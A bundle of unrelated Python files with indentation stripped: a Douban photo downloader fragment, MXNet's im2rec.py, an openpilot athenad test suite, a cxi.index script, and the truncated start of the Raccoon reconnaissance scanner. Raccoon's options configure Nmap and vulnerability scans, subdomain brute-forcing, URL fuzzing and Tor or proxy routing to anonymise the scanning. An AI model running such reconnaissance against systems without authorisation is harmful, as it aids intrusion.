self.worknum = worknum
def downloadworks(self, foldername):
proc_record = []
for i in range(self.worknum):
page_url = self.arg[i]
p = multiprocessing.Process(target = self.func, args = (page_url,i,foldername,))
p.daemon = True
p.start()
proc_record.append(p)
for p in proc_record:
p.join()
if __name__ == '__main__':
# url = "https://www.douban.com/photos/album/1632492290/"
# url = "https://www.douban.com/photos/album/82367742/"
# url = "https://www.douban.com/photos/album/117047793/"
url = "https://www.douban.com/photos/album/1621384085/"
t0 = time.time()
DownloadPhotos(url, 'test')
print(time.time()-t0)
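# --- Hedged sketch (not part of the original script) ---------------------------
# The bookkeeping used above: every page worker pushes its photo count onto a
# shared multiprocessing.Queue and the parent drains the queue to compute the
# album total. A minimal, self-contained illustration of that pattern (the
# worker stands in for getCurrrntpageImageUrl, which reports via countQueue):
def _demo_page_worker(page_index, result_queue):
    # pretend this page produced page_index + 1 photos
    result_queue.put(page_index + 1)

def _queue_count_demo(worknum=3):
    result_queue = multiprocessing.Queue()
    procs = [multiprocessing.Process(target=_demo_page_worker, args=(i, result_queue))
             for i in range(worknum)]
    for p in procs:
        p.start()
    total = sum(result_queue.get() for _ in range(worknum))  # drain before joining
    for p in procs:
        p.join()
    return total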
|
im2rec.py
|
# -*- coding: utf-8 -*-
from __future__ import print_function
import os
import sys
curr_path = os.path.abspath(os.path.dirname(__file__))
sys.path.append(os.path.join(curr_path, "../python"))
import mxnet as mx
import random
import argparse
import cv2
import time
import traceback
try:
import multiprocessing
except ImportError:
multiprocessing = None
def list_image(root, recursive, exts):
i = 0
if recursive:
cat = {}
for path, dirs, files in os.walk(root, followlinks=True):
dirs.sort()
files.sort()
for fname in files:
fpath = os.path.join(path, fname)
suffix = os.path.splitext(fname)[1].lower()
if os.path.isfile(fpath) and (suffix in exts):
if path not in cat:
cat[path] = len(cat)
yield (i, os.path.relpath(fpath, root), cat[path])
i += 1
for k, v in sorted(cat.items(), key=lambda x: x[1]):
print(os.path.relpath(k, root), v)
else:
for fname in sorted(os.listdir(root)):
fpath = os.path.join(root, fname)
suffix = os.path.splitext(fname)[1].lower()
if os.path.isfile(fpath) and (suffix in exts):
yield (i, os.path.relpath(fpath, root), 0)
i += 1
def write_list(path_out, image_list):
with open(path_out, 'w') as fout:
for i, item in enumerate(image_list):
line = '%d\t' % item[0]
for j in item[2:]:
line += '%f\t' % j
line += '%s\n' % item[1]
fout.write(line)
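# write_list() above emits one tab-separated line per image:
#     <index> \t <label float(s)> \t <relative path>
# e.g. the item (0, 'cat/img001.jpg', 0) becomes "0\t0.000000\tcat/img001.jpg",
# which is the format read_list() below parses back.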
def make_list(args):
image_list = list_image(args.root, args.recursive, args.exts)
image_list = list(image_list)
if args.shuffle is True:
random.seed(100)
random.shuffle(image_list)
N = len(image_list)
chunk_size = (N + args.chunks - 1) / args.chunks
for i in xrange(args.chunks):
chunk = image_list[i * chunk_size:(i + 1) * chunk_size]
if args.chunks > 1:
str_chunk = '_%d' % i
else:
str_chunk = ''
sep = int(chunk_size * args.train_ratio)
sep_test = int(chunk_size * args.test_ratio)
if args.train_ratio == 1.0:
write_list(args.prefix + str_chunk + '.lst', chunk)
else:
if args.test_ratio:
write_list(args.prefix + str_chunk + '_test.lst', chunk[:sep_test])
if args.train_ratio + args.test_ratio < 1.0:
write_list(args.prefix + str_chunk + '_val.lst', chunk[sep_test + sep:])
write_list(args.prefix + str_chunk + '_train.lst', chunk[sep_test:sep_test + sep])
def read_list(path_in):
with open(path_in) as fin:
while True:
line = fin.readline()
if not line:
break
line = [i.strip() for i in line.strip().split('\t')]
line_len = len(line)
if line_len < 3:
                print('lst should have at least three parts, but only has %s parts for %s' %(line_len, line))
continue
try:
item = [int(line[0])] + [line[-1]] + [float(i) for i in line[1:-1]]
except Exception, e:
print('Parsing lst met error for %s, detail: %s' %(line, e))
continue
yield item
def image_encode(args, i, item, q_out):
fullpath = os.path.join(args.root, item[1])
if len(item) > 3 and args.pack_label:
header = mx.recordio.IRHeader(0, item[2:], item[0], 0)
else:
header = mx.recordio.IRHeader(0, item[2], item[0], 0)
if args.pass_through:
try:
with open(fullpath) as fin:
img = fin.read()
s = mx.recordio.pack(header, img)
q_out.put((i, s, item))
except Exception, e:
traceback.print_exc()
print('pack_img error:', item[1], e)
q_out.put((i, None, item))
return
try:
img = cv2.imread(fullpath, args.color)
except:
traceback.print_exc()
print('imread error trying to load file: %s ' % fullpath)
q_out.put((i, None, item))
return
if img is None:
print('imread read blank (None) image for file: %s' % fullpath)
q_out.put((i, None, item))
return
if args.center_crop:
if img.shape[0] > img.shape[1]:
            margin = (img.shape[0] - img.shape[1]) / 2
img = img[margin:margin + img.shape[1], :]
else:
            margin = (img.shape[1] - img.shape[0]) / 2
img = img[:, margin:margin + img.shape[0]]
if args.resize:
if img.shape[0] > img.shape[1]:
newsize = (args.resize, img.shape[0] * args.resize / img.shape[1])
else:
newsize = (img.shape[1] * args.resize / img.shape[0], args.resize)
img = cv2.resize(img, newsize)
try:
s = mx.recordio.pack_img(header, img, quality=args.quality, img_fmt=args.encoding)
q_out.put((i, s, item))
except Exception, e:
traceback.print_exc()
print('pack_img error on file: %s' % fullpath, e)
q_out.put((i, None, item))
return
def read_worker(args, q_in, q_out):
while True:
deq = q_in.get()
if deq is None:
break
i, item = deq
image_encode(args, i, item, q_out)
def write_worker(q_out, fname, working_dir):
pre_time = time.time()
count = 0
fname = os.path.basename(fname)
fname_rec = os.path.splitext(fname)[0] + '.rec'
fname_idx = os.path.splitext(fname)[0] + '.idx'
record = mx.recordio.MXIndexedRecordIO(os.path.join(working_dir, fname_idx),
os.path.join(working_dir, fname_rec), 'w')
buf = {}
more = True
while more:
deq = q_out.get()
if deq is not None:
i, s, item = deq
buf[i] = (s, item)
else:
more = False
while count in buf:
s, item = buf[count]
del buf[count]
if s is not None:
record.write_idx(item[0], s)
if count % 1000 == 0:
cur_time = time.time()
print('time:', cur_time - pre_time, ' count:', count)
pre_time = cur_time
count += 1
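# --- Hedged illustration (not part of the original tool) -----------------------
# write_worker() above restores input order: encoded records arrive out of
# order from the worker processes, are parked in `buf` keyed by their index,
# and are flushed as soon as the next expected index is available. The same
# idea on a plain list of (index, payload) pairs:
def _reorder_stream(pairs):
    buf, expected, ordered = {}, 0, []
    for idx, payload in pairs:
        buf[idx] = payload
        while expected in buf:
            ordered.append(buf.pop(expected))
            expected += 1
    return ordered
# _reorder_stream([(1, 'b'), (0, 'a'), (2, 'c')]) == ['a', 'b', 'c']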
def parse_args():
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
description='Create an image list or \
make a record database by reading from an image list')
parser.add_argument('prefix', help='prefix of input/output lst and rec files.')
parser.add_argument('root', help='path to folder containing images.')
cgroup = parser.add_argument_group('Options for creating image lists')
cgroup.add_argument('--list', type=bool, default=False,
help='If this is set im2rec will create image list(s) by traversing root folder\
and output to <prefix>.lst.\
Otherwise im2rec will read <prefix>.lst and create a database at <prefix>.rec')
cgroup.add_argument('--exts', nargs='+', default=['.jpeg', '.jpg'],
help='list of acceptable image extensions.')
cgroup.add_argument('--chunks', type=int, default=1, help='number of chunks.')
cgroup.add_argument('--train-ratio', type=float, default=1.0,
help='Ratio of images to use for training.')
cgroup.add_argument('--test-ratio', type=float, default=0,
help='Ratio of images to use for testing.')
cgroup.add_argument('--recursive', type=bool, default=False,
                        help='If true recursively walk through subdirs and assign a unique label\
to images in each folder. Otherwise only include images in the root folder\
and give them label 0.')
cgroup.add_argument('--shuffle', type=bool, default=True, help='If this is set as True, \
im2rec will randomize the image order in <prefix>.lst')
rgroup = parser.add_argument_group('Options for creating database')
rgroup.add_argument('--pass-through', type=bool, default=False,
help='whether to skip transformation and save image as is')
rgroup.add_argument('--resize', type=int, default=0,
help='resize the shorter edge of image to the newsize, original images will\
be packed by default.')
rgroup.add_argument('--center-crop', type=bool, default=False,
                        help='specify whether to crop the center of the image to make it square.')
rgroup.add_argument('--quality', type=int, default=95,
help='JPEG quality for encoding, 1-100; or PNG compression for encoding, 1-9')
rgroup.add_argument('--num-thread', type=int, default=1,
                        help='number of threads to use for encoding. order of images will be different\
from the input list if >1. the input list will be modified to match the\
resulting order.')
rgroup.add_argument('--color', type=int, default=1, choices=[-1, 0, 1],
help='specify the color mode of the loaded image.\
1: Loads a color image. Any transparency of image will be neglected. It is the default flag.\
0: Loads image in grayscale mode.\
-1:Loads image as such including alpha channel.')
rgroup.add_argument('--encoding', type=str, default='.jpg', choices=['.jpg', '.png'],
help='specify the encoding of the images.')
rgroup.add_argument('--pack-label', type=bool, default=False,
help='Whether to also pack multi dimensional label in the record file')
args = parser.parse_args()
args.prefix = os.path.abspath(args.prefix)
args.root = os.path.abspath(args.root)
return args
if __name__ == '__main__':
args = parse_args()
if args.list:
make_list(args)
else:
if os.path.isdir(args.prefix):
working_dir = args.prefix
else:
working_dir = os.path.dirname(args.prefix)
files = [os.path.join(working_dir, fname) for fname in os.listdir(working_dir)
if os.path.isfile(os.path.join(working_dir, fname))]
count = 0
for fname in files:
if fname.startswith(args.prefix) and fname.endswith('.lst'):
print('Creating .rec file from', fname, 'in', working_dir)
count += 1
image_list = read_list(fname)
# -- write_record -- #
if args.num_thread > 1 and multiprocessing is not None:
q_in = [multiprocessing.Queue(1024) for i in range(args.num_thread)]
q_out = multiprocessing.Queue(1024)
read_process = [multiprocessing.Process(target=read_worker, args=(args, q_in[i], q_out)) \
for i in range(args.num_thread)]
for p in read_process:
p.start()
write_process = multiprocessing.Process(target=write_worker, args=(q_out, fname, working_dir))
write_process.start()
for i, item in enumerate(image_list):
q_in[i % len(q_in)].put((i, item))
for q in q_in:
q.put(None)
for p in read_process:
p.join()
q_out.put(None)
write_process.join()
else:
print('multiprocessing not available, fall back to single threaded encoding')
import Queue
q_out = Queue.Queue()
fname = os.path.basename(fname)
fname_rec = os.path.splitext(fname)[0] + '.rec'
fname_idx = os.path.splitext(fname)[0] + '.idx'
record = mx.recordio.MXIndexedRecordIO(os.path.join(working_dir, fname_idx),
os.path.join(working_dir, fname_rec), 'w')
cnt = 0
pre_time = time.time()
for i, item in enumerate(image_list):
image_encode(args, i, item, q_out)
if q_out.empty():
continue
_, s, _ = q_out.get()
record.write_idx(item[0], s)
if cnt % 1000 == 0:
cur_time = time.time()
print('time:', cur_time - pre_time, ' count:', cnt)
pre_time = cur_time
cnt += 1
if not count:
            print('Did not find any .lst file with prefix %s'%args.prefix)
|
test_athenad.py
|
#!/usr/bin/env python3
import json
import os
import requests
import shutil
import tempfile
import time
import threading
import queue
import unittest
from multiprocessing import Process
from pathlib import Path
from unittest import mock
from websocket import ABNF
from websocket._exceptions import WebSocketConnectionClosedException
from selfdrive import swaglog
from selfdrive.athena import athenad
from selfdrive.athena.athenad import MAX_RETRY_COUNT, dispatcher
from selfdrive.athena.tests.helpers import MockWebsocket, MockParams, MockApi, EchoSocket, with_http_server
from cereal import messaging
class TestAthenadMethods(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.SOCKET_PORT = 45454
athenad.ROOT = tempfile.mkdtemp()
athenad.SWAGLOG_DIR = swaglog.SWAGLOG_DIR = tempfile.mkdtemp()
athenad.Params = MockParams
athenad.Api = MockApi
athenad.LOCAL_PORT_WHITELIST = set([cls.SOCKET_PORT])
def tearDown(self):
athenad.upload_queue = queue.Queue()
athenad.cur_upload_items.clear()
for i in os.listdir(athenad.ROOT):
p = os.path.join(athenad.ROOT, i)
if os.path.isdir(p):
shutil.rmtree(p)
else:
os.unlink(p)
def wait_for_upload(self):
now = time.time()
while time.time() - now < 5:
if athenad.upload_queue.qsize() == 0:
break
def test_echo(self):
assert dispatcher["echo"]("bob") == "bob"
def test_getMessage(self):
with self.assertRaises(TimeoutError) as _:
dispatcher["getMessage"]("controlsState")
def send_deviceState():
messaging.context = messaging.Context()
pub_sock = messaging.pub_sock("deviceState")
start = time.time()
while time.time() - start < 1:
msg = messaging.new_message('deviceState')
pub_sock.send(msg.to_bytes())
time.sleep(0.01)
p = Process(target=send_deviceState)
p.start()
time.sleep(0.1)
try:
deviceState = dispatcher["getMessage"]("deviceState")
assert deviceState['deviceState']
finally:
p.terminate()
def test_listDataDirectory(self):
route = '2021-03-29--13-32-47'
segments = [0, 1, 2, 3, 11]
filenames = ['qlog.bz2', 'qcamera.ts', 'rlog.bz2', 'fcamera.hevc', 'ecamera.hevc', 'dcamera.hevc']
files = [f'{route}--{s}/{f}' for s in segments for f in filenames]
for file in files:
fn = os.path.join(athenad.ROOT, file)
os.makedirs(os.path.dirname(fn), exist_ok=True)
Path(fn).touch()
resp = dispatcher["listDataDirectory"]()
self.assertTrue(resp, 'list empty!')
self.assertCountEqual(resp, files)
resp = dispatcher["listDataDirectory"](f'{route}--123')
self.assertCountEqual(resp, [])
prefix = f'{route}'
expected = filter(lambda f: f.startswith(prefix), files)
resp = dispatcher["listDataDirectory"](prefix)
self.assertTrue(resp, 'list empty!')
self.assertCountEqual(resp, expected)
prefix = f'{route}--1'
expected = filter(lambda f: f.startswith(prefix), files)
resp = dispatcher["listDataDirectory"](prefix)
self.assertTrue(resp, 'list empty!')
self.assertCountEqual(resp, expected)
prefix = f'{route}--1/'
expected = filter(lambda f: f.startswith(prefix), files)
resp = dispatcher["listDataDirectory"](prefix)
self.assertTrue(resp, 'list empty!')
self.assertCountEqual(resp, expected)
prefix = f'{route}--1/q'
expected = filter(lambda f: f.startswith(prefix), files)
resp = dispatcher["listDataDirectory"](prefix)
self.assertTrue(resp, 'list empty!')
self.assertCountEqual(resp, expected)
@with_http_server
def test_do_upload(self, host):
fn = os.path.join(athenad.ROOT, 'qlog.bz2')
Path(fn).touch()
item = athenad.UploadItem(path=fn, url="http://localhost:1238", headers={}, created_at=int(time.time()*1000), id='')
with self.assertRaises(requests.exceptions.ConnectionError):
athenad._do_upload(item)
item = athenad.UploadItem(path=fn, url=f"{host}/qlog.bz2", headers={}, created_at=int(time.time()*1000), id='')
resp = athenad._do_upload(item)
self.assertEqual(resp.status_code, 201)
@with_http_server
def test_uploadFileToUrl(self, host):
not_exists_resp = dispatcher["uploadFileToUrl"]("does_not_exist.bz2", "http://localhost:1238", {})
self.assertEqual(not_exists_resp, 404)
fn = os.path.join(athenad.ROOT, 'qlog.bz2')
Path(fn).touch()
resp = dispatcher["uploadFileToUrl"]("qlog.bz2", f"{host}/qlog.bz2", {})
self.assertEqual(resp['enqueued'], 1)
self.assertDictContainsSubset({"path": fn, "url": f"{host}/qlog.bz2", "headers": {}}, resp['item'])
self.assertIsNotNone(resp['item'].get('id'))
self.assertEqual(athenad.upload_queue.qsize(), 1)
@with_http_server
def test_upload_handler(self, host):
fn = os.path.join(athenad.ROOT, 'qlog.bz2')
Path(fn).touch()
item = athenad.UploadItem(path=fn, url=f"{host}/qlog.bz2", headers={}, created_at=int(time.time()*1000), id='')
end_event = threading.Event()
thread = threading.Thread(target=athenad.upload_handler, args=(end_event,))
thread.start()
athenad.upload_queue.put_nowait(item)
try:
self.wait_for_upload()
time.sleep(0.1)
# TODO: verify that upload actually succeeded
self.assertEqual(athenad.upload_queue.qsize(), 0)
finally:
end_event.set()
def test_upload_handler_timeout(self):
"""When an upload times out or fails to connect it should be placed back in the queue"""
fn = os.path.join(athenad.ROOT, 'qlog.bz2')
Path(fn).touch()
item = athenad.UploadItem(path=fn, url="http://localhost:44444/qlog.bz2", headers={}, created_at=int(time.time()*1000), id='')
item_no_retry = item._replace(retry_count=MAX_RETRY_COUNT)
end_event = threading.Event()
thread = threading.Thread(target=athenad.upload_handler, args=(end_event,))
thread.start()
try:
athenad.upload_queue.put_nowait(item_no_retry)
self.wait_for_upload()
time.sleep(0.1)
# Check that upload with retry count exceeded is not put back
self.assertEqual(athenad.upload_queue.qsize(), 0)
athenad.upload_queue.put_nowait(item)
self.wait_for_upload()
time.sleep(0.1)
# Check that upload item was put back in the queue with incremented retry count
self.assertEqual(athenad.upload_queue.qsize(), 1)
self.assertEqual(athenad.upload_queue.get().retry_count, 1)
finally:
end_event.set()
def test_cancelUpload(self):
item = athenad.UploadItem(path="qlog.bz2", url="http://localhost:44444/qlog.bz2", headers={}, created_at=int(time.time()*1000), id='id')
athenad.upload_queue.put_nowait(item)
dispatcher["cancelUpload"](item.id)
self.assertIn(item.id, athenad.cancelled_uploads)
end_event = threading.Event()
thread = threading.Thread(target=athenad.upload_handler, args=(end_event,))
thread.start()
try:
self.wait_for_upload()
time.sleep(0.1)
self.assertEqual(athenad.upload_queue.qsize(), 0)
self.assertEqual(len(athenad.cancelled_uploads), 0)
finally:
end_event.set()
def test_listUploadQueueEmpty(self):
items = dispatcher["listUploadQueue"]()
self.assertEqual(len(items), 0)
@with_http_server
def test_listUploadQueueCurrent(self, host):
fn = os.path.join(athenad.ROOT, 'qlog.bz2')
Path(fn).touch()
item = athenad.UploadItem(path=fn, url=f"{host}/qlog.bz2", headers={}, created_at=int(time.time()*1000), id='')
end_event = threading.Event()
thread = threading.Thread(target=athenad.upload_handler, args=(end_event,))
thread.start()
try:
athenad.upload_queue.put_nowait(item)
self.wait_for_upload()
items = dispatcher["listUploadQueue"]()
self.assertEqual(len(items), 1)
self.assertTrue(items[0]['current'])
finally:
end_event.set()
def test_listUploadQueue(self):
item = athenad.UploadItem(path="qlog.bz2", url="http://localhost:44444/qlog.bz2", headers={}, created_at=int(time.time()*1000), id='id')
athenad.upload_queue.put_nowait(item)
items = dispatcher["listUploadQueue"]()
self.assertEqual(len(items), 1)
self.assertDictEqual(items[0], item._asdict())
self.assertFalse(items[0]['current'])
@mock.patch('selfdrive.athena.athenad.create_connection')
def test_startLocalProxy(self, mock_create_connection):
end_event = threading.Event()
ws_recv = queue.Queue()
ws_send = queue.Queue()
mock_ws = MockWebsocket(ws_recv, ws_send)
mock_create_connection.return_value = mock_ws
echo_socket = EchoSocket(self.SOCKET_PORT)
socket_thread = threading.Thread(target=echo_socket.run)
socket_thread.start()
athenad.startLocalProxy(end_event, 'ws://localhost:1234', self.SOCKET_PORT)
ws_recv.put_nowait(b'ping')
try:
recv = ws_send.get(timeout=5)
assert recv == (b'ping', ABNF.OPCODE_BINARY), recv
finally:
# signal websocket close to athenad.ws_proxy_recv
ws_recv.put_nowait(WebSocketConnectionClosedException())
socket_thread.join()
def test_getSshAuthorizedKeys(self):
keys = dispatcher["getSshAuthorizedKeys"]()
self.assertEqual(keys, MockParams().params["GithubSshKeys"].decode('utf-8'))
def test_getVersion(self):
resp = dispatcher["getVersion"]()
keys = ["version", "remote", "branch", "commit"]
self.assertEqual(list(resp.keys()), keys)
for k in keys:
self.assertIsInstance(resp[k], str, f"{k} is not a string")
self.assertTrue(len(resp[k]) > 0, f"{k} has no value")
def test_jsonrpc_handler(self):
end_event = threading.Event()
thread = threading.Thread(target=athenad.jsonrpc_handler, args=(end_event,))
thread.daemon = True
thread.start()
try:
# with params
athenad.recv_queue.put_nowait(json.dumps({"method": "echo", "params": ["hello"], "jsonrpc": "2.0", "id": 0}))
resp = athenad.send_queue.get(timeout=3)
self.assertDictEqual(json.loads(resp), {'result': 'hello', 'id': 0, 'jsonrpc': '2.0'})
# without params
athenad.recv_queue.put_nowait(json.dumps({"method": "getNetworkType", "jsonrpc": "2.0", "id": 0}))
resp = athenad.send_queue.get(timeout=3)
self.assertDictEqual(json.loads(resp), {'result': 1, 'id': 0, 'jsonrpc': '2.0'})
# log forwarding
athenad.recv_queue.put_nowait(json.dumps({'result': {'success': 1}, 'id': 0, 'jsonrpc': '2.0'}))
resp = athenad.log_recv_queue.get(timeout=3)
self.assertDictEqual(json.loads(resp), {'result': {'success': 1}, 'id': 0, 'jsonrpc': '2.0'})
finally:
end_event.set()
thread.join()
def test_get_logs_to_send_sorted(self):
fl = list()
for i in range(10):
fn = os.path.join(swaglog.SWAGLOG_DIR, f'swaglog.{i:010}')
Path(fn).touch()
fl.append(os.path.basename(fn))
# ensure the list is all logs except most recent
sl = athenad.get_logs_to_send_sorted()
self.assertListEqual(sl, fl[:-1])
if __name__ == '__main__':
unittest.main()
|
cxi_index.py
|
from __future__ import division
# LIBTBX_SET_DISPATCHER_NAME cxi.index
# LIBTBX_PRE_DISPATCHER_INCLUDE_SH PHENIX_GUI_ENVIRONMENT=1
# LIBTBX_PRE_DISPATCHER_INCLUDE_SH export PHENIX_GUI_ENVIRONMENT
from xfel.cxi.display_spots import run_one_index
from libtbx.utils import Usage, Sorry
import libtbx.option_parser
import sys,os
if (__name__ == "__main__"):
command_line = (libtbx.option_parser.option_parser(
usage="%s [-d] [-s] [-n num_procs] [-o output_dir] [-b output_basename] [-e extension] target=targetpath files" % libtbx.env.dispatcher_name,
more_help=["Target: the phil file containing further indexing/integration parameters"])
.option(None, "--no_display", "-d",
action="store_true",
default=False,
dest="no_display",
help="Do not show indexing graphics")
.option(None, "--skip_processed", "-s",
action="store_true",
default=False,
dest="skip_processed",
help="Skip files that have alread been processed")
.option(None, "--num_procs", "-n",
type="int",
default=1,
dest="num_procs",
help="Number of processors to use")
.option(None, "--output_dir", "-o" ,
type="string",
default=None,
dest="output_dir",
help="Directory for integration pickles")
.option(None, "--output_basename", "-b",
type="string",
default="int_",
dest="output_basename",
help="String to append to the front of output integration pickles")
.option(None, "--extension", "-e",
type="string",
default=".pickle",
dest="extension",
help="File extension use to filter input files if a directory is given as input")
).process(args=sys.argv[1:])
files = [arg for arg in command_line.args if os.path.isfile(arg)]
dirs = [arg for arg in command_line.args if os.path.isdir(arg)]
for directory in dirs:
for path in os.listdir(directory):
if os.path.splitext(path)[1] == command_line.options.extension:
files.append(os.path.join(directory, path))
arguments = [arg for arg in command_line.args if not os.path.isfile(arg) and not os.path.isdir(arg)]
found_it = False
for arg in arguments:
if "target=" in arg:
found_it = True
break
if not found_it:
raise Usage(command_line.parser.usage)
if command_line.options.no_display:
display = False
arguments.append('--nodisplay')
else:
display = True
assert command_line.options.num_procs > 0
if command_line.options.output_dir is not None and \
not os.path.isdir(command_line.options.output_dir):
raise Sorry("Output dir %s doesn't exist"%command_line.options.output_dir)
def do_work(item):
file, arguments, kwargs = item
try:
run_one_index(file, *arguments, **({'display':display}))
except Exception as e:
if hasattr(e, "classname"):
print e.classname, "for %s:"%file,
else:
print "Indexing error for %s:"%file,
print e
if command_line.options.num_procs == 1:
for file in files:
if command_line.options.output_dir is not None:
int_pickle_path = os.path.join(command_line.options.output_dir, \
command_line.options.output_basename + os.path.basename(file))
if command_line.options.skip_processed and os.path.isfile(int_pickle_path):
print file, "already processed, skipping"
continue
arguments.append("indexing.completeness_pickle=%s"%int_pickle_path)
do_work((file, arguments, ({'display':display})))
else:
import multiprocessing, copy
def worker():
for item in iter( q.get, None ):
do_work(item)
q.task_done()
q.task_done()
q = multiprocessing.JoinableQueue()
procs = []
for i in range(command_line.options.num_procs):
procs.append(multiprocessing.Process(target=worker))
procs[-1].daemon = True
procs[-1].start()
for file in files:
if command_line.options.output_dir is not None:
int_pickle_path = os.path.join(command_line.options.output_dir, \
command_line.options.output_basename + os.path.basename(file))
if command_line.options.skip_processed and os.path.isfile(int_pickle_path):
print file, "already processed, skipping"
continue
args = copy.copy(arguments)
args.append("indexing.completeness_pickle=%s"%int_pickle_path)
else:
args = arguments
q.put((file, args, ({'display':display})))
q.join()
for p in procs:
q.put( None )
q.join()
for p in procs:
p.join()
print "Finished everything...."
print "num active children:", len(multiprocessing.active_children())
|
main.py
|
import time
import asyncio
import threading
import click
import os
import sys
from raccoon_src.utils.coloring import COLOR, COLORED_COMBOS
from raccoon_src.utils.exceptions import RaccoonException, HostHandlerException
from raccoon_src.utils.request_handler import RequestHandler
from raccoon_src.utils.logger import SystemOutLogger
from raccoon_src.utils.help_utils import HelpUtilities
from raccoon_src.lib.fuzzer import URLFuzzer
from raccoon_src.lib.host import Host
from raccoon_src.lib.scanner import Scanner, NmapScan, NmapVulnersScan, VulnersScanner
from raccoon_src.lib.sub_domain import SubDomainEnumerator
from raccoon_src.lib.dns_handler import DNSHandler
from raccoon_src.lib.waf import WAF
from raccoon_src.lib.tls import TLSHandler
from raccoon_src.lib.web_app import WebApplicationScanner
# Set path for relative access to builtin files.
MY_PATH = os.path.abspath(os.path.dirname(__file__))
def intro(logger):
logger.info("""{}
_____ _____ _____ ____ ____ _ _
| __ \ /\ / ____| / ____| / __ \ / __ \ | \ | |
| |__) | / \ | | | | | | | | | | | | | \| |
| _ / / /\ \ | | | | | | | | | | | | | . ` |
| | \ \ / ____ \ | |____ | |____ | |__| | | |__| | | |\ |
|_| \_\ /_/ \_\ \_____| \_____| \____/ \____/ |_| \_|
{}
4841434b414c4c5448455448494e4753
https://github.com/evyatarmeged/Raccoon
-------------------------------------------------------------------
""".format(COLOR.GRAY, COLOR.RESET))
@click.command()
@click.version_option("0.8.5")
@click.argument("target")
@click.option("-d", "--dns-records", default="A,MX,NS,CNAME,SOA,TXT",
help="Comma separated DNS records to query. Defaults to: A,MX,NS,CNAME,SOA,TXT")
@click.option("--tor-routing", is_flag=True, help="Route HTTP traffic through Tor (uses port 9050)."
" Slows total runtime significantly")
@click.option("--proxy-list", help="Path to proxy list file that would be used for routing HTTP traffic."
" A proxy from the list will be chosen at random for each request."
" Slows total runtime")
@click.option("-c", "--cookies", help="Comma separated cookies to add to the requests. "
"Should be in the form of key:value\n"
"Example: PHPSESSID:12345,isMobile:false")
@click.option("-h", "--headers", help="Comma separated headers to add to the requests. "
"Should be in the form of key:value\n"
"Example: Authorization:12345,x-something:false")
@click.option("--proxy", help="Proxy address to route HTTP traffic through. Slows total runtime")
@click.option("-w", "--wordlist", default=os.path.join(MY_PATH, "raccoon_src/wordlists/fuzzlist"),
help="Path to wordlist that would be used for URL fuzzing")
@click.option("-T", "--threads", default=25,
help="Number of threads to use for URL Fuzzing/Subdomain enumeration. Default: 25")
@click.option("--ignored-response-codes", default="302,400,401,402,403,404,503,504",
help="Comma separated list of HTTP status code to ignore for fuzzing."
" Defaults to: 302,400,401,402,403,404,503,504")
@click.option("--subdomain-list", default=os.path.join(MY_PATH, "raccoon_src/wordlists/subdomains"),
help="Path to subdomain list file that would be used for enumeration")
@click.option("-sc", "--scripts", is_flag=True, help="Run Nmap scan with -sC flag")
@click.option("-sv", "--services", is_flag=True, help="Run Nmap scan with -sV flag")
@click.option("-f", "--full-scan", is_flag=True, help="Run Nmap scan with both -sV and -sC")
@click.option("-p", "--port", help="Use this port range for Nmap scan instead of the default")
@click.option("--vulners-nmap-scan", is_flag=True, help="Perform an NmapVulners scan. "
"Runs instead of the regular Nmap scan and is longer.")
@click.option("--vulners-path", default=os.path.join(MY_PATH, "raccoon_src/utils/misc/vulners.nse"),
help="Path to the custom nmap_vulners.nse script."
"If not used, Raccoon uses the built-in script it ships with.")
@click.option("-fr", "--follow-redirects", is_flag=True, default=False,
help="Follow redirects when fuzzing. Default: False (will not follow redirects)")
@click.option("--tls-port", default=443, help="Use this port for TLS queries. Default: 443")
@click.option("--skip-health-check", is_flag=True, help="Do not test for target host availability")
@click.option("--no-url-fuzzing", is_flag=True, help="Do not fuzz URLs")
@click.option("--no-sub-enum", is_flag=True, help="Do not bruteforce subdomains")
@click.option("--skip-nmap-scan", is_flag=True, help="Do not perform an Nmap scan")
# @click.option("-d", "--delay", default="0.25-1",
# help="Min and Max number of seconds of delay to be waited between requests\n"
# "Defaults to Min: 0.25, Max: 1. Specified in the format of Min-Max")
@click.option("-q", "--quiet", is_flag=True, help="Do not output to stdout")
@click.option("-o", "--outdir", default="Raccoon_scan_results",
help="Directory destination for scan output")
def main(target,
tor_routing,
proxy_list,
proxy,
cookies,
headers,
dns_records,
wordlist,
threads,
ignored_response_codes,
subdomain_list,
full_scan,
scripts,
services,
port,
vulners_nmap_scan,
vulners_path,
tls_port,
skip_health_check,
follow_redirects,
no_url_fuzzing,
no_sub_enum,
skip_nmap_scan,
# delay,
outdir,
quiet):
try:
# ------ Arg validation ------
# Set logging level and Logger instance
log_level = HelpUtilities.determine_verbosity(quiet)
logger = SystemOutLogger(log_level)
intro(logger)
target = target.lower()
try:
HelpUtilities.validate_executables()
except RaccoonException as e:
logger.critical(str(e))
exit(9)
HelpUtilities.validate_wordlist_args(proxy_list, wordlist, subdomain_list)
HelpUtilities.validate_proxy_args(tor_routing, proxy, proxy_list)
HelpUtilities.create_output_directory(outdir)
if tor_routing:
logger.info("{} Testing that Tor service is up...".format(COLORED_COMBOS.NOTIFY))
elif proxy_list:
if proxy_list and not os.path.isfile(proxy_list):
raise FileNotFoundError("Not a valid file path, {}".format(proxy_list))
else:
logger.info("{} Routing traffic using proxies from list {}\n".format(
COLORED_COMBOS.NOTIFY, proxy_list))
elif proxy:
logger.info("{} Routing traffic through proxy {}\n".format(COLORED_COMBOS.NOTIFY, proxy))
# TODO: Sanitize delay argument
dns_records = tuple(dns_records.split(","))
ignored_response_codes = tuple(int(code) for code in ignored_response_codes.split(","))
if port:
HelpUtilities.validate_port_range(port)
# ------ /Arg validation ------
if cookies:
try:
cookies = HelpUtilities.parse_cookie_arg(cookies)
except RaccoonException as e:
logger.critical("{}{}{}".format(COLOR.RED, str(e), COLOR.RESET))
exit(2)
# Set Request Handler instance
request_handler = RequestHandler(
proxy_list=proxy_list,
tor_routing=tor_routing,
single_proxy=proxy,
cookies=cookies
)
if tor_routing:
try:
HelpUtilities.confirm_traffic_routs_through_tor()
logger.info("{} Validated Tor service is up. Routing traffic anonymously\n".format(
COLORED_COMBOS.NOTIFY))
except RaccoonException as err:
print("{}{}{}".format(COLOR.RED, str(err), COLOR.RESET))
exit(3)
if 'win32' in sys.platform:
main_loop = asyncio.ProactorEventLoop()
asyncio.set_event_loop(main_loop)
else:
main_loop = asyncio.get_event_loop()
logger.info("{}### Raccoon Scan Started ###{}\n".format(COLOR.GRAY, COLOR.RESET))
